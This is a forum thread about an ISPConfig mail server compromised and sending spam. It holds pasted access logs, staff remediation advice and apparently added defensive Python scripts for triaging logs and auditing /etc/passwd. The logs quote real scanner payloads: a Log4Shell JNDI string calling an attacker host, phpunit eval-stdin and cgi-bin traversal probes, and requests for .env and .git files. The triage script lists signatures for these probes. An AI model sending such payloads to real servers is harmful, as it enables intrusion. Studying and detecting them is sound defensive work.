My mail send spam from localhost[127.0.0.1] client from helo=mega.nz

Discussion in 'General' started by Alexcho, Dec 27, 2021.

  1. Alexcho

    Alexcho New Member

    Client 2:
    Code:
    64.62.197.212 - - [29/Dec/2021:00:16:20 +0000] "GET / HTTP/1.1" 200 7730 "-" "-"                           
    195.54.160.149 - -[29/Dec/2021:00:27:02 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Bas>
    109.237.103.118 - -[29/Dec/2021:02:45:39 +0000] "GET / HTTP/1.0" 400 528 "-" "-"                            
    109.237.103.118 - -[29/Dec/2021:02:45:39 +0000] "GET /.git/config HTTP/1.1" 404 6033 "-" "Mozilla/5.0 (X11; >
    109.237.103.123 - -[29/Dec/2021:03:38:37 +0000] "GET /.env HTTP/1.1" 404 6033 "-" "Mozilla/5.0 (X11; Linux x>
    167.94.138.59 - - [29/Dec/2021:04:50:16 +0000] "GET / HTTP/1.1" 200 8302 "-" "-"                             
    167.94.138.59 - -[29/Dec/2021:04:50:17 +0000] "GET / HTTP/1.1" 200 7317 "-" "Mozilla/5.0 (compatible; Censys>
    185.162.235.164 - -[29/Dec/2021:05:10:19 +0000] "GET /api/productConfig HTTP/1.1" 404 5909 "-" "Mozilla/5.0 >
    61.219.11.151 - -[29/Dec/2021:05:10:47 +0000] "GET / HTTP/1.0" 400 528 "-" "-"                               
    104.206.128.26 - -[29/Dec/2021:07:25:27 +0000] "GET / HTTP/1.1" 200 7730 "-" "https://gdnplus.com:Gather Ana>
    85.214.234.232 - -[29/Dec/2021:07:40:36 +0000] "GET / HTTP/1.1" 200 6397 "-" "Mozilla/5.0 (Windows NT 5.1; r>
    85.214.234.232 - -[29/Dec/2021:07:40:36 +0000] "GET /HNAP1/ HTTP/1.1" 404 5568 "https://78.83.83.26/" "Mozil>
    195.154.87.159 - -[29/Dec/2021:08:03:43 +0000] "GET /wp-login.php HTTP/1.1" 404 360 "-" "Mozilla/5.0 (X11; U>
    192.241.212.172 - -[29/Dec/2021:08:37:45 +0000] "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.e>
    192.241.212.101 - -[29/Dec/2021:08:45:53 +0000] "GET /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f HTTP/>
    188.95.55.106 - -[29/Dec/2021:10:20:28 +0000] "GET / HTTP/1.1" 200 1218 "-" "python-requests/2.22.0"       
    188.95.55.106 - -[29/Dec/2021:10:20:28 +0000] "GET / HTTP/1.1" 200 6886 "-" "python-requests/2.22.0"
    64.246.165.190 - -[29/Dec/2021:10:55:21 +0000] "GET /robots.txt HTTP/1.0" 200 270 "-" "Mozilla/5.0 (Macintos>
    64.246.165.190 - -[29/Dec/2021:10:55:21 +0000] "GET / HTTP/1.1" 200 1181 "-" "Mozilla/5.0 (Macintosh; Intel >
    195.54.160.149 - -[29/Dec/2021:11:33:12 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTT>
    198.199.94.190 - -[29/Dec/2021:12:07:15 +0000] "GET /actuator/health HTTP/1.1" 404 5909 "-" "Mozilla/5.0 zgr>
    195.54.160.149 - -[29/Dec/2021:12:13:55 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP>
    195.54.160.149 - -[29/Dec/2021:13:03:50 +0000] "GET /index.php?s=/Index/\\think\\app/invokefunction&function>
    195.54.160.149 - -[29/Dec/2021:13:34:48 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 7324 "-" ">
    156.146.50.181 - -[29/Dec/2021:14:06:31 +0000] "OPTIONS / HTTP/1.1" 200 5860 "-" "Mozilla/5.0 (Macintosh; In>
    103.203.57.29 - -[29/Dec/2021:14:41:50 +0000] "GET / HTTP/1.1" 200 7324 "-" "Mozilla/5.0 (Windows NT 10.0; W>
    109.237.103.38 - - [29/Dec/2021:15:19:36 +0000] "GET / HTTP/1.0" 400 528 "-" "-"                             
    109.237.103.38 - -[29/Dec/2021:15:19:36 +0000] "GET /.env HTTP/1.1" 404 6080 "-" "Mozilla/5.0 (X11; Linux x8>
    195.54.160.149 - -[29/Dec/2021:16:04:05 +0000] "GET /console/ HTTP/1.1" 404 6507 "-" "Mozilla/5.0 (Windows N>
    195.54.160.149 - -[29/Dec/2021:17:03:23 +0000] "GET /_ignition/execute-solution HTTP/1.1" 404 6507 "-" "Mozi>
    66.249.64.58 - -[29/Dec/2021:17:27:43 +0000] "GET /ads.txt HTTP/1.1" 404 6544 "-" "Mozilla/5.0 (compatible; >
    192.241.207.109 - -[29/Dec/2021:17:28:35 +0000] "GET / HTTP/1.1" 200 6738 "-" "Mozilla/5.0 zgrab/0.x"       
    176.53.222.136 - -[29/Dec/2021:17:56:58 +0000] "GET / HTTP/1.1" 200 6842 "-" "Mozilla/5.0 (Windows NT 10.0; >
    176.53.222.136 - -[29/Dec/2021:17:56:58 +0000] "GET /favicon.ico HTTP/1.1" 200 7632 "-" "Mozilla/5.0 (Window>
    195.54.160.149 - -[29/Dec/2021:19:08:16 +0000] "GET / HTTP/1.1" 200 7324 "-" "Mozilla/5.0 (Windows NT 10.0; >
    195.54.160.149 - -[29/Dec/2021:19:25:38 +0000] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 6539 >
    178.239.21.103 - -[29/Dec/2021:19:49:42 +0000] "GET ///libs/js/iframe.js HTTP/1.1" 404 5624 "-" "python-requ>
    195.54.160.149 - -[29/Dec/2021:20:10:19 +0000] "GET / HTTP/1.1" 200 7324 "-" "Mozilla/5.0 (Windows NT 10.0; >
    121.5.147.119 - -[29/Dec/2021:20:13:11 +0000] "GET / HTTP/1.1" 200 7324 "-" "Mozilla/5.0 (Linux; Android 6.0>
    107.180.124.232 - -[29/Dec/2021:20:15:03 +0000] "GET /wp-login.php HTTP/1.1" 404 360 "-" "Mozilla/5.0 (X11; >
    18.205.72.90 - -[29/Dec/2021:20:36:25 +0000] "GET / HTTP/1.1" 200 7424 "-" "Mozilla/5.0+(compatible; MxToolb>
    18.205.72.90 - -[29/Dec/2021:20:36:25 +0000] "GET / HTTP/1.1" 200 2300 "-" "Mozilla/5.0+(compatible; MxToolb>
    195.54.160.149 - -[29/Dec/2021:21:20:03 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Bas>
    66.249.64.58 - -[29/Dec/2021:21:27:10 +0000] "GET /robots.txt HTTP/1.1" 200 6450 "-" "Mozilla/5.0 (compatibl>
    52.42.94.2 - -[29/Dec/2021:22:44:57 +0000] "GET / HTTP/1.1" 200 1218 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64>
    192.241.211.144 - -[29/Dec/2021:22:52:15 +0000] "GET /owa/auth/x.js HTTP/1.1" 404 5909 "-" "Mozilla/5.0 zgra>
    192.241.209.65 - -[29/Dec/2021:22:54:07 +0000] "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.ex>
    192.241.213.120 - -[29/Dec/2021:22:55:32 +0000] "GET /owa/auth/logon.aspx HTTP/1.1" 404 5909 "-" "Mozilla/5.>
    
    Other access log for client 2
    Code:
    208.138.25.30 - - [30/Dec/2021:05:14:53 +0000] "GET / HTTP/1.0" 400 528 "-" "-"                             
    154.212.160.170 - - [30/Dec/2021:07:02:27 +0000] "HEAD /wp-content/plugins/mstore-api/assets/js/mstore-inspir>
    109.248.6.86 - - [30/Dec/2021:07:58:44 +0000] "GET / HTTP/1.0" 200 7798 "-" "masscan-ng/1.3 (https://github.c>
    195.54.160.149 - - [30/Dec/2021:08:20:42 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTT>
    192.241.213.228 - - [30/Dec/2021:08:40:21 +0000] "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.e>
    192.241.212.227 - - [30/Dec/2021:08:48:47 +0000] "GET /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f HTTP/>
    195.54.160.149 - - [30/Dec/2021:08:54:51 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP>
    195.54.160.149 - - [30/Dec/2021:10:01:16 +0000] "GET /index.php?s=/Index/\\think\\app/invokefunction&function>
    192.241.214.210 - - [30/Dec/2021:12:09:22 +0000] "GET /actuator/health HTTP/1.1" 404 5909 "-" "Mozilla/5.0 zg>
    216.218.206.69 - - [30/Dec/2021:12:39:53 +0000] "GET / HTTP/1.1" 200 7730 "-" "-"                           
    195.54.160.149 - - [30/Dec/2021:13:00:41 +0000] "GET /console/ HTTP/1.1" 404 6507 "-" "Mozilla/5.0 (Windows N>
    195.54.160.149 - - [30/Dec/2021:13:24:54 +0000] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 6507 "-" ">
    66.228.32.204 - - [30/Dec/2021:14:08:15 +0000] "GET / HTTP/1.0" 400 528 "-" "-"                             
    209.141.53.74 - - [30/Dec/2021:14:35:47 +0000] "GET / HTTP/1.0" 400 528 "-" "-"                             
    195.54.160.149 - - [30/Dec/2021:14:46:01 +0000] "GET / HTTP/1.1" 200 7324 "-" "Mozilla/5.0 (Windows NT 10.0; >
    195.54.160.149 - - [30/Dec/2021:15:35:47 +0000] "GET / HTTP/1.1" 200 7324 "-" "Mozilla/5.0 (Windows NT 10.0; >
    195.54.160.149 - - [30/Dec/2021:16:40:08 +0000] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 6539 >
    
    I cannot copy the error log for client2.

    Sorry for my long messages, I work from my phone and don't know how I can upload files from the Ubuntu server to Android.

    So.... What can I do with this error from ISPConfig? What do I have to do right now? Can I turn my SMTP connection on again, and how? It's no problem to reinstall the server, but the point for me is to learn how to resolve problems. I'm new to Ubuntu, maybe for 5-6 months, so sorry for the stupid questions...
     
    Last edited: Dec 31, 2021
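The access logs above are a mix of routine crawler traffic and mass-scanner probes (the `${jndi:` Log4Shell string, the phpunit `eval-stdin.php` path, `/.env` and `/.git/config` requests, the `/cgi-bin/.%2e/` traversal, the Exchange `/owa/` and `/ecp/` paths). A quick way to separate the two when reading logs from a phone is a small triage script. The following is an added example, not code from the thread or from ISPConfig; the log lines it contains are constructed to mirror the ones posted above (shortened user agents, placeholder 203.0.113.5 in the JNDI string), and the signature names are my own labels. It handles both the standard `- - [` spacing and the `- -[` spacing seen in the pasted logs, and counts lines it cannot parse instead of dropping them silently.

```python
import re
from collections import defaultdict

# Apache/nginx combined log format:
#   host ident user [time] "request" status bytes "referer" "agent"
# The " ?" before "[" tolerates the collapsed "- -[" spacing in the pasted logs.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ ?\[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)

# Probe families visible in the thread's logs. Names are assumptions (my labels).
SIGNATURES = [
    ("log4shell-probe", re.compile(r"\$\{jndi:", re.I)),
    ("phpunit-eval-stdin", re.compile(r"/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin\.php", re.I)),
    ("dotfile-exposure", re.compile(r"/\.(env|git/config)(\?|$| )", re.I)),
    ("cgi-path-traversal", re.compile(r"/cgi-bin/.*\.%2e", re.I)),
    ("thinkphp-invokefunction", re.compile(r"invokefunction", re.I)),
    ("exchange-recon", re.compile(r"/(owa|ecp|autodiscover)/", re.I)),
    ("wordpress-login-probe", re.compile(r"/wp-login\.php", re.I)),
]

# Constructed sample, modelled on the posted lines (not copied from the thread).
SAMPLE_LOG = """\
195.54.160.149 - - [29/Dec/2021:00:27:02 +0000] "GET /?x=${jndi:ldap://203.0.113.5:1389/a} HTTP/1.1" 200 7324 "-" "-"
109.237.103.118 - -[29/Dec/2021:02:45:39 +0000] "GET /.git/config HTTP/1.1" 404 6033 "-" "Mozilla/5.0 (X11; Linux x86_64)"
109.237.103.118 - -[29/Dec/2021:03:38:37 +0000] "GET /.env HTTP/1.1" 404 6033 "-" "Mozilla/5.0 (X11; Linux x86_64)"
195.54.160.149 - - [29/Dec/2021:11:33:12 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 6507 "-" "-"
195.54.160.149 - - [29/Dec/2021:19:25:38 +0000] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 6539 "-" "-"
192.241.212.101 - - [29/Dec/2021:08:45:53 +0000] "GET /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f HTTP/1.1" 404 5909 "-" "Mozilla/5.0 zgrab/0.x"
66.249.64.58 - - [29/Dec/2021:21:27:10 +0000] "GET /robots.txt HTTP/1.1" 200 6450 "-" "Mozilla/5.0 (compatible; Googlebot/2.1)"
this line is not in combined log format
"""


def parse_line(line):
    """Return the named fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(request):
    """Return the signature names that match the request string ('METHOD path proto')."""
    return [name for name, rx in SIGNATURES if rx.search(request)]


def triage(text):
    """Group matched signatures per client IP.

    Returns (findings, unparsed): findings maps IP -> sorted list of signature
    names; unparsed counts non-empty lines that did not match LOG_RE.
    A 404/400 next to a probe means it missed; a 2xx on a query-string probe
    (like the JNDI one) only means the base path exists, not that it worked.
    """
    findings = defaultdict(set)
    unparsed = 0
    for line in text.splitlines():
        if not line.strip():
            continue
        rec = parse_line(line)
        if rec is None:
            unparsed += 1
            continue
        for name in classify(rec["request"]):
            findings[rec["ip"]].add(name)
    return {ip: sorted(names) for ip, names in findings.items()}, unparsed


if __name__ == "__main__":
    found, bad = triage(SAMPLE_LOG)
    for ip, names in sorted(found.items()):
        print(f"{ip:16} {', '.join(names)}")
    print(f"unparsed lines: {bad}")
```

Run it against a real file with `triage(open("/var/log/apache2/access.log").read())`. In the sample, every probe returned 404 or 400, which is the normal picture for internet background noise; what to look for on a server that is already sending spam is a probe against a path that answered 200 and that belongs to a site which actually existed at the time.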
  2. Taleman

    Taleman Well-Known Member HowtoForge Supporter

    You should find the malware on that website and remove it.
    And: Please post listings and logs in CODE tags so they are more readable.
     
    Alexcho likes this.
  3. till

    till Super Moderator Staff Member ISPConfig Developer

    The ISPConfig IDS alerts might be false positives though. It might be that there is just a special combination of chars in the ssl cert (which is very uncommon but possible) that triggers the IDS scan. Is this a self signed ssl cert or is it a cert that you bought somewhere? If it's just a self-signed cert, then you can try to create a new self-signed cert to see if the IDS alert is triggered again, or disable IDS alerts for admin user temporarily in /usr/local/ispconfig/security/security_settings.ini
    This is not a solution for your spam sending problems though, which needs to be investigated further.
     
    Alexcho likes this.
  4. Alexcho

    Alexcho New Member

    I deleted all sites earlier, so I don't have any sites on this panel anymore.
    And I will edit all my posts to use CODE tags. Thanks!
     
  5. Alexcho

    Alexcho New Member

    This SSL cert is from the panel. I made a new one and the error is gone!
    And I also blocked outgoing connections on port 25.
    Does the UUCP user need an SSH connection? I blocked all connections; only my IPs are allowed.
     
    Last edited: Dec 31, 2021
  6. Jesse Norell

    Jesse Norell Well-Known Member Staff Member Howtoforge Staff

    No, no one should ever log in as uucp, and that is not normally allowed. Your server may be more compromised than just an individual website, you might consider reinstalling from scratch if you don't have any sites on it anyways.
     
    Alexcho likes this.
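Jesse's point is that `uucp` is a system account and should have no login shell at all, so an SSH login as that user is itself a sign of tampering. One check a practitioner would run on a box like this is to read `/etc/passwd` and list every system account (UID below 1000) that still has an interactive shell, plus any extra account with UID 0. The script below is an added example, not from the thread or from ISPConfig; the passwd listing inside it is constructed (the `uucp` shell and the `support` account are deliberately wrong to show what a finding looks like), and `audit()` is my own helper name.

```python
# Shells that refuse interactive login on Debian/Ubuntu and RHEL-style systems.
NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/usr/bin/false"}

# Constructed sample /etc/passwd; uucp and support are intentionally wrong.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
support:x:0:0::/root:/bin/bash
alexcho:x:1000:1000:Alex:/home/alexcho:/bin/bash
"""


def parse_passwd(text):
    """Parse passwd(5) lines into dicts; skip comments and malformed lines."""
    users = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) != 7:
            continue
        name, _pw, uid, gid, _gecos, home, shell = parts
        users.append({"name": name, "uid": int(uid), "gid": int(gid),
                      "home": home, "shell": shell})
    return users


def audit(text, system_uid_max=999):
    """Flag system accounts with a login shell and non-root accounts with UID 0.

    system_uid_max=999 matches the Debian/Ubuntu convention that UIDs below
    1000 are system accounts; root is excluded because it legitimately has a shell.
    """
    users = parse_passwd(text)
    system_with_shell = [
        u["name"] for u in users
        if u["uid"] <= system_uid_max and u["name"] != "root"
        and u["shell"] not in NOLOGIN_SHELLS
    ]
    extra_uid0 = [u["name"] for u in users if u["uid"] == 0 and u["name"] != "root"]
    return {
        "system_accounts_with_login_shell": system_with_shell,
        "extra_uid0_accounts": extra_uid0,
    }


if __name__ == "__main__":
    import sys
    # With no argument, audit the constructed sample; pass a path to audit a real file.
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_PASSWD
    for key, names in audit(text).items():
        print(f"{key}: {names or 'none'}")
```

On a clean Ubuntu install both lists come back empty; `uucp` normally has `/usr/sbin/nologin`. A non-empty result is one more reason to take the reinstall-from-scratch advice rather than trying to clean the host in place.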
  7. Alexcho

    Alexcho New Member

    It's not a problem to reinstall. But it is better to learn something. It was a great lesson for me and, I hope, for someone else. I have to reinstall it anyway, because I've changed a lot of things ... The point was to pick it up after someone dropped it down. Now I'll try to get my IP removed from many blacklists and learn something else if there is anything to learn. In the end I will make a clean installation. Thank you all for your help! If anyone is thinking of adding something - welcome! Happy New Year! Be alive and healthy and good luck! CHEERS!
     
    till likes this.